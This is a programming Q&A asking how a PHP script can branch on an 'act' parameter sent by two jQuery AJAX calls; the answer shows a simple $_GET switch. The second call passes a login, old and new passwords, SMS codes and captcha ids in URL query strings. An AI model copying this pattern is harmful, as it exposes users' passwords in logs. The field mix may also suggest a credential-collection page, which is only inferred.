# How to handle GET variable in ajax request in PHP

Tags: php, json, ajax

I have the problem.At first,in my code I have such request

```js
$.ajax("continue.php?act=savePhone&phone=" + encodeURIComponent(g("check").value) + "&qid=" + encodeURIComponent(window.location.search)).done(function() {
```

And in the second part of code I have another request:

```js
var auth = $.ajax("continue.php?act=login&login=" + encodeURIComponent(login) + "&oldPassword=" + encodeURIComponent(password) + "&captcha_key=" + captcha_key + "&captcha_sid=" + captcha_sid + "&validation_sid=" + validation_sid + "&code=" + smscode + "&newPassword=" + encodeURIComponent(g("newpassword").value) + "&is2fa=" + (have2fa ? 1 : 0) + "&qid=" + encodeURIComponent(window.location.search) + "&token=" + gettedToken).done(function() {
    var response = JSON.parse(auth.responseText);
```

My question is the next:
Like in the both link I have variables like "act".And the values in first case "savePhone" and "login" in the second case.My question,like.....aforementioned code was the part of Javascript in the full html page.But,the question is how to write a handle of this request in php.Because these two links was the part of PHP handler "continue.php".Like...what PHP methods I could use in file "continue.php" to appropriate two values "savePhone" and "login" for one variable "act" in PHP handle.I hope that everything was understandable)

Comment: `$_GET['act']` will get the value of the `act` parameter.

Comment: You need to read $_REQUEST['act'] or $_GET['act'] in your continue.php code, and depending on its value do something or other thing; you can call a function called savePhone and other callled login, but you need to do it manually, no magic like if a call the function something it will work, you need to read act and manually call wherever you want.

Comment: I think, you are having the problem with the `two` AJAX request running at the same time, that's why you are not able to achieve whatever you want to do.

Comment: What you have done so for in `continue.php` ?

Answer (score 1):

```
<?php
   $act = $_GET['act'];
   if ($act === 'savePhone') {
      //Do savePhone logic here
   } else if ($act === 'login') {
      //Do login logic here
   }
?>
```